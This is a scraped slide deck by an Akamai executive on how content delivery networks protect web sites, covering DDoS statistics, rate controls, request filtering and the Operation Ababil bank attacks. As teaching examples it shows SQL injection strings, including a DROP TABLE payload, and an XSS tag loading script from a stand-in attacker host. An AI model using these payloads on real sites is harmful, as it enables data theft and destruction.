the role of content delivery networks in protecting web sites from attacks bruce maggs vp for...

The Role of Content Delivery Networksin

Protecting Web Sites from Attacks

Bruce Maggs

VP for Research, Akamai Technologies

©2013 AKAMAI | FASTER FORWARDTM

The Akamai Platform and Services

Daily Traffic:• 33+ Tbps peak• 19+ million hits per second• 600+ million IPv4 clients/day• 4+ trillion deliveries/day• 30+ petabytes/day• 10+ million concurrent streams

Delivering 130,000+ Domains

• All top 60 ecommerce sites• All top 30 media & entertainment companies • 9 of the top 10 banks• All of the top Internet portals

• 175,000+ Servers• 1,300+ Networks• 2,500+ Physical Locations• 650+ Cities• 100+ Countries

A Global Platform:


Distributed Denial of Service (DDOS) Attacks

The attacker hopes to overwhelm the content provider’s resources with requests for service.

Sometimes the attacker employs a “bot army” of compromised machines.

The attacker tries to issue requests for content that cannot be cached.

The attacker looks for “amplification” where an easy-to-generate request requires a difficult-to-generate response.


991 1317 2002 2936

2013

20112010

2012

Attack Frequency (Attacks Detected and Mitigated)

5634

2014


Gbps

Mpps 20092008

2005

112

2006

188

2007

2211

39

15

48

29

2010

68

38

2011

79

45

2012

8269

2014

320

270

2013

190

144

Largest Attacks by Year


Attack Types Q3 2014


US23.95%

China20.07%

Germany5.78%

Korea6.13%

Mexico14.16%

Brazil17.60%

Japan4.10%

Russia2.97%

India2.81%

Thailand2.43%

Attack Origins Q3 2014


Avoid data theft and downtime by extending the security perimeter outside the data-center and protect from increasing frequency, scale and sophistication of web attacks.

Targeted Industry Sectors


Origin Server

End User

1

10

100

10000

Origin Traffic

1000

Akamai Traffic

1

10

100

10000

1000

The Akamai Platform Provides a Perimeter Defense


Defeating HTTP flooding attacks – Rate Controls

1. Count the number of Forward Requests

2. Block any IP address with excessive forward requests

Client Request

Forward Request

Forward Response

CustomerOrigin

AkamaiEdge Server

XCustom Error page


Filtering Out Malformed Requests

• SQL injection attacks

• Cross-site scripting (XSS) attacks

• Cache busting attacks


Relational databases

Relational databases store tables consisting of rows and columns.

(image from http://support.sas.com)


Structured Query Language (SQL)

Example Query:

SELECT * FROM Employees WHERE LName = ’PARKER’;

IdNum LName FName JobCode Salary Phone1354 PARKER MARY FA3 65800 914/455-2337


Example SQL Injection

Suppose a program creates the following SQL query, where userName is a variable holding input provided by an end-user, e.g., through a form on a Web page.

SELECT * FROM Employees WHERE LName = ’” + userName + ”’;”

But instead of entering a name like PARKER the user enters

’ or ’1’=’1

Then the query becomes

SELECT * FROM Employees WHERE LName = ’’ or ’1’=’1’;

This query returns all rows in the Employees table!


A More Destructive Injection

Same code as before:

SELECT * FROM Employees WHERE LName = ’” + userName + ”’;”

But now suppose the user enters

a’; DROP TABLE Employees

Then the query becomes

SELECT * FROM Employees WHERE LName = ’a’; DROP TABLE Employees;

This query might delete the Employees table! (Not all databases allow two queries in the same string.)


bobby-tables.com: A guide to preventing SQL injection

(from the comic strip xkcd)


Cross-Site Scripting

Attacker types this into text entry form:

<script src=http://theftsRus.com/script.js></script>

Attacker hopes that later the site will insert this into the HTML that it outputs, and then the victim’s browser will execute the script.

http://theftsrus.com/script.js


Cache Busting

Attacker adds query strings to the end of a requested URL, e.g.,

http://ak.xyz.com/logo.gif?id=832164328

Attacker hopes that the CDN will view each request with a different query string as a request for a different object, and fetch a new copy from the content provider.

http://ak.xyz.com/logo.gif?id=832164328


Operation Ababil

Phase 1Sep 12 – Early Nov 2012

• DNS packets with “AAAAA” payload

• Limited Layer 7 attacks• Early-mid Oct 2012

announced names of banks where attacks succeeded

• (Did not announce bank names if attacks were unsuccessful)

• Began use of HTTP dynamic content to circumvent static caching defenses

Phase 2Dec 12, 2012 – Jan 29

• Incorporate random query strings and values

• Addition of random query strings against PDFs

• Additions to bot army

• Burst probes to bypass rate-limiting controls

• Addition of valid argument names, random values

Phase 3

• Multiple probes• Multiple targets• Increased focus on Layer

7 attacks• Target banks where

attacks work• Fraudsters take

advantage

Late Feb 2013 – May 2013

“none of the U.S banks will be safe from our attacks”

Phase 4

• Used fake plug-ins to infect files

July 2013 –


DNS Traffic Handled by Akamai

1.8 M

1.6 M

1.4 M

1.2 M

1.0 M

0.8 M

0.6 M

0.4 M

0.2 M

0.0

Total eDNS

Tues 12:00 Wed 00:00 Wed12:00

s

Phase 1 Attack – Sept 2012

20

Attack Traffic:

23 Gbps(10,000X normal)

Duration:

4.5 Hours

High volume of non-standard packets sent to UDP port 53Packets did not include a valid DNS headerPackets consisted of large blocks of repeating “A”sThe packets were abnormally large Simultaneously, a SYN-Flood was directed against TCP port 53


Phase 2 Attacks - January 2nd, 2013

Bank #1

Bank #2

Bank #3

Bank #4

Bank #5QCF targeted PDF files

Akamai Dynamic Caching Rules offloaded 100% of the traffic

No Origin Impact



Bank #1

Bank #2

Bank #3

Bank #4

Bank #5QCF targeted marketing web pages

Rate controls automatically activatedAttack was deflected, far from bank’s datacenter

No Origin Impact



Bank #1

Bank #2

Bank #3

Bank #4

Bank #5QCF targeted SSL

Akamai offloaded 99% of the traffic

No Origin Impact



Bank #1

Bank #2

Bank #3

Bank #4

Bank #5

12:03 PM 9:00 AM

Error/Outage—site not responding

Gomez agents in 12 cities measuring hourly

NOT on Akamai



Bank #1

Bank #2

Bank #3

Bank #4

Bank #5

Gomez agents in 12 cities measuring hourly

NOT on Akamai

12:44 PM 6:21 PM

Error/Outage—site not responding


Phase 3 Attack Example

• Attack started at March 5, 2013 morning

• Peak Attack Traffic > 126 thousand requests per second

• 70x normal Edge Bandwidth (29Gbps)• Origin Traffic stayed at normal levels

• ~2000 Agents participated in the 20 minute assault• 80% of the agents were new IP addresses that had not participated in earlier

campaigns


Attack Tactics - Pre-attack Reconnaissance

Attackers test the site with short burst high speed probes• Short bursts of attack requests on non-cacheable content every 10 minutes• Peak of 18 million requests per second

If the site falters, they announce that they will attack that bank and return later with a full scale attack

If the site is resilient they move on


Observations

Due to recent attack sizes, infrastructure capacity build out is not economical, and may not work anyway

• Attacks range from 13X to 70X normal traffic, 25X to 120X normal request volume

The burst speed of attacks has become too fast for reactive mitigation – a proactive “always-on” defense is necessary

the role of content delivery networks in protecting web sites from attacks bruce maggs vp for...

Documents

akamai faster forwardtm991

akamai host

akamai faster forwardtm

forward request requests

largest attacks

attack frequency attacks

origin server usefull

sophistication of web